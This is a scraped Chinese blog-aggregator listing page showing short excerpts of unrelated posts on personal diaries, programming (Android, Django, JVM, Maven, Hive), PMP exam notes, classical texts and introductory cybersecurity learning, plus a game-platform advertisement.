<div>今日总结：1.上午体验课以及反馈2.p1专注力上课3.情绪精品营上课4.燕子营队辅营以及前台值班5.活动室带孩子接待带到访今日反思：1.合理安排体力2.对于准客户记得跟进3.不要放过每一次成交的机会（这个精品营转发有点失败，后期需调整）今日感受：1.为了效果，后期课程一定想方设法布置家庭，给予一个好的支持系统2.上到下午的课程感觉特别特别的累3.晚上在做辅营一个孩子大声叫喊，后来单独出去沟通，其实</div> </li> <li><a href="/article/1773604712738783232.htm" title="android 自定义曲线图,Android自定义View——贝赛尔曲线" target="_blank">android 自定义曲线图,Android自定义View——贝赛尔曲线</a> <span class="text-muted">weixin_39767513</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%AE%9A%E4%B9%89%E6%9B%B2%E7%BA%BF%E5%9B%BE/1.htm">自定义曲线图</a> <div>个人博客：haichenyi.com。感谢关注本文针对有一定自定义View的童鞋，最好对贝赛尔曲线有辣么一丢丢了解，不了解也没关系。花5分钟看一下GcsSloop的安卓自定义View进阶-Path之贝塞尔曲线。本文的最终效果图：最终效果图.gif思路首先他是一个只有上半部分的正弦形状的水波纹，很规则。其次，他这个正弦图左右在移动。然后，就是它这个自定义View，上下也在移动，是慢慢增加的最后，优化</div> </li> <li><a href="/article/1773581925500387328.htm" title="信任" target="_blank">信任</a> <span class="text-muted">饮冰伊乔</span> <div>随着社会的发展，微信和支付宝交易给人们带来了极大的方便，越来越多的人出门都只选择拿一部手机即可，方便安全，可昨天我就遇到了一件比较尴尬的事。昨天傍晚，我从公司出来，感觉有点饿，决定索性吃了饭再回去，来到去过几次的一个店里，如往常一样叫了餐，当时店里吃饭的不多，老板麻利的先去做了，正要扫微信付账的时候发现手机没电了，迷之尴尬，我只好跟老板说不用做了，手机没电了，我身上又没现金，付不了帐了。老板娘很热</div> </li> <li><a href="/article/1773563645456875520.htm" title="口才训练的第一个礼物" target="_blank">口才训练的第一个礼物</a> <span class="text-muted">Leah82</span> <div>昨天，看到陶子教练在总结里写的“随机抽，已经是很久远的年代了”，Tom教练在后面回复“久远是多远？不过是几个月罢了！”。看着就想笑。对呀，感觉很久远的事，不过是几个月而已。为什么会有这种感觉呢？因为，在这短短的几个月里，我们都经历了太多太多。成长，蜕变，口才，思想……“那久远的年代里”，曾经让自己心惊胆战的随机抽，已经是过眼云烟了。但是，我们还是记忆犹新。因为，随机抽通关，是我们跨入口才训练大门后</div> </li> <li><a href="/article/1773554866065571840.htm" title="Django之Debug篇" target="_blank">Django之Debug篇</a> <span class="text-muted">菜鸟之编程</span> <a class="tag" taget="_blank" href="/search/Django/1.htm">Django</a><a class="tag" taget="_blank" href="/search/django/1.htm">django</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a> <div>一、DebugToolBar基本使用1.1、概述Django框架的调试工具栏使用django-debug-toolbar库，是一组可配置的面板，显示有关当前请求/响应的各种调试信息，点击时，显示有关面板内容的更多详细信息。官方文档：DjangoDebugToolbar—DjangoDebugToolbar4.3.0documentation1.2、安装pipinstalldjango-debug-</div> </li> <li><a href="/article/1773540138937286656.htm" title="【计算机网络】第 3 问：电路交换、报文交换、分组交换之间的区别？" target="_blank">【计算机网络】第 3 问：电路交换、报文交换、分组交换之间的区别？</a> <span class="text-muted">孤独打铁匠Julian</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA408%E8%80%83%E7%A0%94%E9%9D%A2%E8%AF%95/1.htm">计算机408考研面试</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>电路交换、报文交换、分组交换之间的区别？省流图详解电路交换电路交换的优点电路交换的缺点建立连接时间长的原因报文交换报文交换的优点报文交换的缺点分组交换分组交换的优点分组交换的缺点比较总结省流图详解电路交换在进行数据传输前，两个结点之间必须先建立一条专用（双方独占）的物理通信路径（由通信双方之间的交换设备和链路逐段连接而成），该路径可能经过许多中间结点。这一路径在整个数据传输期间一直被独占，直到通信</div> </li> <li><a href="/article/1773528686033698816.htm" title="【嵌入式模块】步进电机使用总结" target="_blank">【嵌入式模块】步进电机使用总结</a> <span class="text-muted">记录无知岁月</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E8%AE%BE%E5%A4%87/1.htm">嵌入式设备</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%A1%AC%E4%BB%B6/1.htm">嵌入式硬件</a><a class="tag" taget="_blank" href="/search/%E6%AD%A5%E8%BF%9B%E7%94%B5%E6%9C%BA/1.htm">步进电机</a> <div>关于本博客  此前上了一门课《自动控制元件》，但是由于学时有限，讲到步进电机就不讲了，留下了一个小遗憾，导致需要使用步进电机时就有点懵，于是找了一篇博客，链接在这里，推荐具有电机知识（如直流电机，异步电机等）的朋友看，如果完全不懂，建议先啃书。</div> </li> <li><a href="/article/1773515880156692480.htm" title="以高质量调查研究助力组织工作提质增效" target="_blank">以高质量调查研究助力组织工作提质增效</a> <span class="text-muted">木同木同</span> <div>近日，中共中央办公厅印发了《关于在全党大兴调查研究的工作方案》(后简称《方案》），要求各地区各部门结合实际认真贯彻落实。调查研究是我们党的传家宝，是谋事之基、成事之道。组织部门作为党管干部的核心部门，肩负着管党员、管干部、管人才的重要职责，调查研究更是把握组织工作规律、破解组织工作难题的重要办法。要用好调查研究这一法宝，把准政治方向，贯穿问题导向，坚持实事求是，以高质量调查研究助力组织工作提质增效</div> </li> <li><a href="/article/1773514618988199936.htm" title="地低为海人低为王" target="_blank">地低为海人低为王</a> <span class="text-muted">缘梦草</span> <div>地低为海，人低为王。低，高之基，高，低之顶。谦虚才能收益，咄咄逼人会招损。高粱熟了，头会低下。受益反而会深藏不露。捧人之术，把人捧高，然后控制。受控之人，大都是虚荣心作祟。活成别人想象中的样子，像别人想象中那么有面子的活着是悲哀的。穷不可怕，怕的是虚荣心。当你好面子，你就会被控制。一旦受虚荣心控制，你不得不谨小慎微的维护面子，付出多余的能量，希望得到别人的一句赞。面子就是金子打造的牢笼，让你在赞美</div> </li> <li><a href="/article/1773499744581124096.htm" title="计划比盲目做重要" target="_blank">计划比盲目做重要</a> <span class="text-muted">一祉微笑</span> <div>坚持分享第99天。一次次会议提醒着老师们假期余额不足，马上面临停机状态。50多天掐指而过，想想放假时的计划，对照如今的完成情况，感觉差太远。想着好好看书，如今50多天过去了第6本还处在未完待续状态；想着假期好好陪陪孩子，在玩中学一些知识，如今想想，孩子学的真不多；想着暑假坚持跑步，有时还是容易给自己找借口，休息三两天。给这个假期一个综合评价，只能说只完成了计划的百分之五六十。想想为什么临近开学没达</div> </li> <li><a href="/article/1773499614951964672.htm" title="#D174-读书会作业-《财务自由之路》3" target="_blank">#D174-读书会作业-《财务自由之路》3</a> <span class="text-muted">白洲笔记</span> <div>最近沉迷于写作营，一直就没时间去弄读书会的作业，书的第二遍也就看了个开头，趁着日更的时间，赶紧把作业做了，这次是15到21课。【1.印象最深刻的部分】(本周所读内容中印象最深刻的部分)*活在未来，最正确的方法是什么？用正确的方法做正确的事情，判断什么是正确的？逻辑。学会思考。"作对事情"永远比“把事情作对“重要的多。”长远思考，耐心验证，小心总结提炼“证明自己正确并不是学习的任务和目标，时刻成长，</div> </li> <li><a href="/article/1773498604284084224.htm" title="感恩日志 第【1210】天：（2019.02.01）（腊月二十七）" target="_blank">感恩日志 第【1210】天：（2019.02.01）（腊月二十七）</a> <span class="text-muted">山东慧恩贺守金</span> <div>今日感悟：二十七撇松枝！今日是真正的第一天假期：吃饭找物业看望父母打麻将。时间过的飞快，转眼间，已经放假5天了，保养车，购置年货，送礼，出差，回家。春节假期：陪伴父母、妻儿的时间，反思的时间，规划的时间。白天太忙，忙着各种琐事，晚上才真正有时间留给自己，思考，总结。感恩这一个充实而忙碌的一天。</div> </li> <li><a href="/article/1773480451348955136.htm" title="倒贴服传奇在什么平台下载 2024最火的倒贴服传奇平台排行榜" target="_blank">倒贴服传奇在什么平台下载 2024最火的倒贴服传奇平台排行榜</a> <span class="text-muted">诸葛村夫一游戏频道</span> <div>2024游戏盒子网站排行榜大全随着数位科技的发展，2024年手游市场持续火爆，各种新开手游持续涌现。本文为广大手游爱好者带来巅峰推荐，总结五个最具实力的手游新服发布网站，为您提供最全面的游戏资讯以及专业的游戏攻略。▶2024最火的倒贴服传奇平台排行榜TOP1：游戏豹官网特点：内部特权游戏类型：多类型推荐日活跃人数：15万网址链接：www.ystt88.cn游戏介绍：游戏豹官网以快速获取新开手游的特</div> </li> <li><a href="/article/1773477172762181632.htm" title="081天 约柜失而复得" target="_blank">081天 约柜失而复得</a> <span class="text-muted">宁宁2018</span> <div>撒迦利亚书4:6他对我说：“这是耶和华指示所罗巴伯的。万军之耶和华说：‘不是倚靠势力，不是倚靠才能，乃是倚靠我的灵方能成事。’</div> </li> <li><a href="/article/1773471029155397632.htm" title="网络安全（黑客）——自学2024" target="_blank">网络安全（黑客）——自学2024</a> <span class="text-muted">小言同学喜欢挖漏洞</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a> <div>01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一</div> </li> <li><a href="/article/1773470776930926592.htm" title="黑客（网络安全）技术自学30天" target="_blank">黑客（网络安全）技术自学30天</a> <span class="text-muted">一个迷人的黑客</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a> <div>01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一</div> </li> <li><a href="/article/1773470235618246656.htm" title="昨日收益（6月15日）" target="_blank">昨日收益（6月15日）</a> <span class="text-muted">李问寸</span> <div>好多天没有晒收益了，今天继续补上。我发现，就是要去晒一下收益，这样才知道自己每天有没有认真去对待，关注自己的收益如何。是多了，还是少了？虽然每天都有去看，但是看完之后呢？是否有总结一下呢？所以，建议大家可以整理一下自己的收益。好了，开始说是我的收益了。昨天收益突破50了，获取了51.54，其中Poc收益为51.27，持钻收益为0.27。昨日收益另外，之前没去关注收益的具体情况，今天看了一下，昨天的</div> </li> <li><a href="/article/1773468344071028736.htm" title="《金文成〈正蒙〉日记124。2020-11-9》" target="_blank">《金文成〈正蒙〉日记124。2020-11-9》</a> <span class="text-muted">金吾生</span> <div>《金文成〈正蒙〉日记124。2020-11-9》今天是庚子丁亥丙子，九月廿四，2020年11月9日星期一。作者篇7【舜之孝，汤、武之武，虽顺逆不同，其为不幸均矣。】船山讲解说，顺，指的是舜的父亲最终受到感化，转变了态度，结局圆满之事；逆，指的是＂桀放、纣诛＂，即，商汤放桀，周武诛纣，都是采用暴力，不是感化方式，所以是逆。顺与逆，都是为了解决弊政，然其差异之大如此，然而，无论圆满还是遗憾，其实他们都</div> </li> <li><a href="/article/1773458565772673024.htm" title="【鸿蒙HarmonyOS开发笔记】ArkUI常用组件介绍汇总（更新中）" target="_blank">【鸿蒙HarmonyOS开发笔记】ArkUI常用组件介绍汇总（更新中）</a> <span class="text-muted">温、</span> <a class="tag" taget="_blank" href="/search/%E9%B8%BF%E8%92%99HarmonyOS%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/1.htm">鸿蒙HarmonyOS开发笔记</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/1.htm">学习记录</a><a class="tag" taget="_blank" href="/search/harmonyos/1.htm">harmonyos</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E5%8D%8E%E4%B8%BA/1.htm">华为</a> <div>概述此文总结开发中用到的一些常用组件，便于查阅，此文持续更新，闲的没事就更线性布局（Row/Column）不多介绍了，最常用的布局组件，两者除了方向不一样，别的都一样方便起见下面只写Column常用属性排列方向上的间距：spaceColumn({space:20}){Row().width('90%').height(50).backgroundColor(0xF5DEB3)Row().width</div> </li> <li><a href="/article/1773451453554294784.htm" title="如何把大象装进冰箱的思考 210624" target="_blank">如何把大象装进冰箱的思考 210624</a> <span class="text-muted">大丁_初心生活</span> <div>央视春晚曾有个小品，宋丹丹问赵本山，如何把大象装进冰箱。赵本山说不知道。宋丹丹得意地说，第一步，把冰箱门打开。第二步，把大象装进去。第三步，把冰箱门关上。我相信很多人看了都是一笑了之，我们也从潜意识上给出了否定的答案。樊登老师给出了不一样的解读，他认为这其实是解决问题的经典方法。“把大象装冰箱”，目标十分明确，宋丹丹给出的执行步骤也十分清晰。可赵本山却不会？难道赵本山不知道这三个步骤吗？肯定知道。</div> </li> <li><a href="/article/1773444718840053760.htm" title="排序算法太多？常用排序都在这了，一篇文章总结和实现所有面试会考的排序算法（基于Python实现）" target="_blank">排序算法太多？常用排序都在这了，一篇文章总结和实现所有面试会考的排序算法（基于Python实现）</a> <span class="text-muted">宇宙之一粟</span> <a class="tag" taget="_blank" href="/search/%E4%B8%8D%E5%BD%92%E8%B7%AF%E4%B9%8BPython/1.htm">不归路之Python</a><a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/IT%E9%9D%A2%E8%AF%95%E9%A2%98%E6%94%B6%E9%9B%86%E4%B8%8E%E6%80%BB%E7%BB%93/1.htm">IT面试题收集与总结</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E4%B8%8E%E7%AE%97%E6%B3%95/1.htm">数据结构与算法</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a><a class="tag" taget="_blank" href="/search/%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95/1.htm">排序算法</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>文章目录排序算法1.常见的排序算法1.1选择排序1.1.1思想1.1.2实现**1.1.3选择排序分析**1.2冒泡排序**1.2.1思想****1.2.2实现****1.2.3冒泡排序分析**1.3插入排序**1.3.1思想****1.3.2实现****1.3.3插入排序分析**1.4归并排序☆☆★**1.4.1思想****1.4.2实现****1.4.3归并排序分析**1.5快速排序☆★★**</div> </li> <li><a href="/article/1773437340203679744.htm" title="2018-12-02" target="_blank">2018-12-02</a> <span class="text-muted">子分小</span> <div>姓名：张颖公司：菲尔德国际英语【反省总结第146天，始于20180709今天是20181202】【知～学习】六项精进大纲背诵3遍每天十个单词坚持第181天每天学习一篇英文文章第94天英语流利说课程第71天学习30分钟【行～实践】一、修身：（对自己个人）步行5000步二、齐家：（对家庭和家人）无三、建功：（对工作)完成与Arti活动课和两节Demo准备开班事宜｛积善｝：发愿从2018年7月9日起1年</div> </li> <li><a href="/article/1773432631829004288.htm" title="风险管理和采购管理核心考点梳理" target="_blank">风险管理和采购管理核心考点梳理</a> <span class="text-muted">WorkLee</span> <a class="tag" taget="_blank" href="/search/PMP/1.htm">PMP</a><a class="tag" taget="_blank" href="/search/PMP/1.htm">PMP</a><a class="tag" taget="_blank" href="/search/%E9%A3%8E%E9%99%A9%E7%AE%A1%E7%90%86/1.htm">风险管理</a><a class="tag" taget="_blank" href="/search/%E9%87%87%E8%B4%AD%E7%AE%A1%E7%90%86/1.htm">采购管理</a> <div>个人总结，仅供参考，欢迎加好友一起讨论PMP-风险管理和采购管理核心考点梳理风险管理风险是一个中性词，包括机会和威胁。风险管理的子过程非常多，但是相对来说子过程之间的逻辑非常清晰，整个风险管理的过程都是在维护一个非常重要的工件-风险登记册。风险管理是项目管理全生命周期都要开展的。1）规划风险管理风险管理计划包含哪些内容？解析：风险管理计划是描述如何安排与实施风险管理活动。（风险管理计划中无风险）包</div> </li> <li><a href="/article/1773432630256140288.htm" title="沟通管理和相关方管理核心考点梳理" target="_blank">沟通管理和相关方管理核心考点梳理</a> <span class="text-muted">WorkLee</span> <a class="tag" taget="_blank" href="/search/PMP/1.htm">PMP</a><a class="tag" taget="_blank" href="/search/PMP/1.htm">PMP</a><a class="tag" taget="_blank" href="/search/%E6%B2%9F%E9%80%9A%E7%AE%A1%E7%90%86/1.htm">沟通管理</a><a class="tag" taget="_blank" href="/search/%E7%9B%B8%E5%85%B3%E6%96%B9/1.htm">相关方</a><a class="tag" taget="_blank" href="/search/%E5%B9%B2%E7%B3%BB%E4%BA%BA/1.htm">干系人</a> <div>个人总结，仅供参考，欢迎加好友一起讨论PMP-沟通管理和相关方管理核心考点梳理沟通管理和相关方（干系人）管理这两章放在一起进行梳理，这两章很多的考点很容易混淆，经常会纠结于一些题目，究竟选择沟通管理还是干系人管理的知识点。沟通管理1）规划沟通管理沟通在PMP中是指信息流的传递，PM是根据谁的需求来确定这种信息流的传递方式、频率，内容、格式呢？解析：规划沟通管理是基于每个相关方或相关方群体的信息需求</div> </li> <li><a href="/article/1773387157499609088.htm" title="道德经第三十四章" target="_blank">道德经第三十四章</a> <span class="text-muted">套马地汉纸</span> <div>道德经第三十四章原文：大道泛兮，其可左右！万物恃之而生，而不辞，功成不名有。爱养万物而不为主，常无欲，可名于小；万物归焉而不为主，可名为大。是以圣人终不为大，故能成其大。译文：大道广泛流行，无所不到。万物依赖它生长而不推辞，有所成就而不自以为有功。养育万物而不自以为主，永远没有私欲，可以说是渺小得很，所以可称它为“小”；物归附于它而它不自以为主宰，可以说极其伟大，所以可称它为“大”。由于它不自以为</div> </li> <li><a href="/article/1773377374927257600.htm" title="Linux学习系列之vim编辑器（一）" target="_blank">Linux学习系列之vim编辑器（一）</a> <span class="text-muted">llibertyll</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a> <div>vi编辑器的操作模式输入模式—aio等—>命令模式<—：键—末行模式从输入/末行模式切换到命令模式都是需要按ESC键注:a光标后输入，i光标前输入，o直接向下加一行输入，O向上加一行输入在vi编辑器中光标的移动（命令行模式下）键组合（命令）光标的移动$光标移动到当前行的结尾0（零）光标移动到当前行的开始GG光标移动到最后一行gg光标移动到第一行在命令行模式下删除与复制的操作键组合（命令）含义dd删</div> </li> <li><a href="/article/1773376952053334016.htm" title="四叶草系统会议总结-2021-09-06" target="_blank">四叶草系统会议总结-2021-09-06</a> <span class="text-muted">小马过河的写作空间</span> <div>大家好，我是狂奔的小马哥，来自深圳，一名工程师，2020年2月注册芬香，2021年2月开始建群做芬香，2021年3月底离开了一段时间，2021年9月份重新进入这个团队首先感恩芬香公司提供的平台机会，感恩我的邀请人和老师小四老师，介绍给我这么好的事业，让我可以结识到这么好的平台和优秀的老师非常感谢老师邀请我重新参与会议，让我有机会向老师和优秀的小伙伴学习悟到：经书易得，人师难求在我离开的这段时间，我</div> </li> <li><a href="/article/29.htm" title="SQL的各种连接查询" target="_blank">SQL的各种连接查询</a> <span class="text-muted">xieke90</span> <a class="tag" taget="_blank" href="/search/UNION+ALL/1.htm">UNION ALL</a><a class="tag" taget="_blank" href="/search/UNION/1.htm">UNION</a><a class="tag" taget="_blank" href="/search/%E5%A4%96%E8%BF%9E%E6%8E%A5/1.htm">外连接</a><a class="tag" taget="_blank" href="/search/%E5%86%85%E8%BF%9E%E6%8E%A5/1.htm">内连接</a><a class="tag" taget="_blank" href="/search/JOIN/1.htm">JOIN</a> <div>一、内连接   概念：内连接就是使用比较运算符根据每个表共有的列的值匹配两个表中的行。                 内连接（join 或者inner join ）       SQL语法：       select * fron</div> </li> <li><a href="/article/156.htm" title="java编程思想--复用类" target="_blank">java编程思想--复用类</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BB%A7%E6%89%BF/1.htm">继承</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%90%86/1.htm">代理</a><a class="tag" taget="_blank" href="/search/%E7%BB%84%E5%90%88/1.htm">组合</a><a class="tag" taget="_blank" href="/search/final%E7%B1%BB/1.htm">final类</a> <div>      复用类看着标题都不知道是什么,再加上java编程思想翻译的比价难懂,所以知道现在才看这本软件界的奇书   一:组合语法:就是将对象的引用放到新类中即可     代码:     package com.wj.reuse; /** * * @author Administrator 组</div> </li> <li><a href="/article/283.htm" title="[开源与生态系统]国产CPU的生态系统" target="_blank">[开源与生态系统]国产CPU的生态系统</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/cpu/1.htm">cpu</a> <div>       计算机要从娃娃抓起...而孩子最喜欢玩游戏....       要让国产CPU在国内市场形成自己的生态系统和产业链,国家和企业就不能够忘记游戏这个非常关键的环节....       投入一些资金和资源,人力和政策,让游</div> </li> <li><a href="/article/410.htm" title="JVM内存区域划分Eden Space、Survivor Space、Tenured Gen，Perm Gen解释" target="_blank">JVM内存区域划分Eden Space、Survivor Space、Tenured Gen，Perm Gen解释</a> <span class="text-muted">商人shang</span> <a class="tag" taget="_blank" href="/search/jvm%E5%86%85%E5%AD%98/1.htm">jvm内存</a> <div>jvm区域总体分两类，heap区和非heap区。heap区又分：Eden Space（伊甸园）、Survivor Space(幸存者区)、Tenured Gen（老年代-养老区）。 非heap区又分：Code Cache(代码缓存区)、Perm Gen（永久代）、Jvm Stack(java虚拟机栈)、Local Method Statck(本地方法栈)。 HotSpot虚拟机GC算法采用分代收</div> </li> <li><a href="/article/537.htm" title="页面上调用 QQ" target="_blank">页面上调用 QQ</a> <span class="text-muted">oloz</span> <a class="tag" taget="_blank" href="/search/qq/1.htm">qq</a> <div><A href="tencent://message/?uin=707321921&amp;Site=有事Q我&amp;Menu=yes">   <img style="border:0px;" src=http://wpa.qq.com/pa?p=1:707321921:1></a></div> </li> <li><a href="/article/664.htm" title="一些问题" target="_blank">一些问题</a> <span class="text-muted">文强chu</span> <a class="tag" taget="_blank" href="/search/%E9%97%AE%E9%A2%98/1.htm">问题</a> <div>1.eclipse 导出 doc  出现“The Javadoc command does not exist.” javadoc command 选择 jdk/bin/javadoc.exe 2.tomcate 配置 web 项目 ..... SQL:3.mysql  * 必须得放前面 否则  select&nbs</div> </li> <li><a href="/article/791.htm" title="生活没有安全感" target="_blank">生活没有安全感</a> <span class="text-muted">小桔子</span> <a class="tag" taget="_blank" href="/search/%E7%94%9F%E6%B4%BB/1.htm">生活</a><a class="tag" taget="_blank" href="/search/%E5%AD%A4%E7%8B%AC/1.htm">孤独</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%84%9F/1.htm">安全感</a> <div>       圈子好小，身边朋友没几个，交心的更是少之又少。在深圳，除了男朋友，没几个亲密的人。不知不觉男朋友成了唯一的依靠，毫不夸张的说，业余生活的全部。现在感情好，也很幸福的。但是说不准难免人心会变嘛，不发生什么大家都乐融融，发生什么很难处理。我想说如果不幸被分手(无论原因如何)，生活难免变化很大，在深圳，我没交心的朋友。明</div> </li> <li><a href="/article/918.htm" title="php 基础语法" target="_blank">php 基础语法</a> <span class="text-muted">aichenglong</span> <a class="tag" taget="_blank" href="/search/php+%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95/1.htm">php 基本语法</a> <div>1 .1 php变量必须以$开头 <?php $a=” b”; echo ?> 1 .2 php基本数据库类型 Integer  float/double Boolean string 1 .3 复合数据类型 数组array和对象 object 1 .4 特殊数据类型  null 资源类型(resource)    $co</div> </li> <li><a href="/article/1045.htm" title="mybatis tools 配置详解" target="_blank">mybatis tools 配置详解</a> <span class="text-muted">AILIKES</span> <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a> <div>MyBatis Generator中文文档 MyBatis Generator中文文档地址： http://generator.sturgeon.mopaas.com/ 该中文文档由于尽可能和原文内容一致，所以有些地方如果不熟悉，看中文版的文档的也会有一定的障碍，所以本章根据该中文文档以及实际应用，使用通俗的语言来讲解详细的配置。 本文使用Markdown进行编辑，但是博客显示效</div> </li> <li><a href="/article/1172.htm" title="继承与多态的探讨" target="_blank">继承与多态的探讨</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/JAVA%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1+%E7%BB%A7%E6%89%BF+%E5%AF%B9%E8%B1%A1/1.htm">JAVA面向对象 继承 对象</a> <div>继承 extends   多态 继承是面向对象最经常使用的特征之一：继承语法是通过继承发、基类的域和方法 //继承就是从现有的类中生成一个新的类，这个新类拥有现有类的所有extends是使用继承的关键字：     在A类中定义属性和方法； class A{ //定义属性 int age； //定义方法 public void go</div> </li> <li><a href="/article/1299.htm" title="JS的undefined与null的实例" target="_blank">JS的undefined与null的实例</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div><form name="theform" id="theform"> </form> <script language="javascript"> var a alert(typeof(b)); //这里提示undefined if(theform.datas</div> </li> <li><a href="/article/1426.htm" title="TDD实践（一）" target="_blank">TDD实践（一）</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%95%8F%E6%8D%B7/1.htm">敏捷</a><a class="tag" taget="_blank" href="/search/TDD/1.htm">TDD</a> <div>一.TDD概述         TDD：测试驱动开发，它的基本思想就是在开发功能代码之前，先编写测试代码。也就是说在明确要开发某个功能后，首先思考如何对这个功能进行测试，并完成测试代码的编写，然后编写相关的代码满足这些测试用例。然后循环进行添加其他功能，直到完全部功能的开发。     </div> </li> <li><a href="/article/1553.htm" title="[Maven学习笔记十]Maven Profile与资源文件过滤器" target="_blank">[Maven学习笔记十]Maven Profile与资源文件过滤器</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a> <div>什么是Maven Profile Maven Profile的含义是针对编译打包环境和编译打包目的配置定制，可以在不同的环境上选择相应的配置，例如DB信息，可以根据是为开发环境编译打包，还是为生产环境编译打包，动态的选择正确的DB配置信息   Profile的激活机制 1.Profile可以手工激活，比如在Intellij Idea的Maven Project视图中可以选择一个P</div> </li> <li><a href="/article/1680.htm" title="【Hive八】Hive用户自定义生成表函数(UDTF)" target="_blank">【Hive八】Hive用户自定义生成表函数(UDTF)</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/hive/1.htm">hive</a> <div>1. 什么是UDTF   UDTF，是User Defined Table-Generating Functions，一眼看上去，貌似是用户自定义生成表函数，这个生成表不应该理解为生成了一个HQL Table， 貌似更应该理解为生成了类似关系表的二维行数据集   2. 如何实现UDTF 继承org.apache.hadoop.hive.ql.udf.generic</div> </li> <li><a href="/article/1807.htm" title="tfs restful api 加auth 2.0认计" target="_blank">tfs restful api 加auth 2.0认计</a> <span class="text-muted">ronin47</span> <div>　　目前思考如何给tfs的ngx-tfs api增加安全性。有如下两点： 　　一是基于客户端的ip设置。这个比较容易实现。 　　二是基于OAuth2.0认证，这个需要lua，实现起来相对于一来说，有些难度。 　　现在重点介绍第二种方法实现思路。 　　 前言：我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算，阅读下面的文档，实现自动化并获得收益。SeatGe</div> </li> 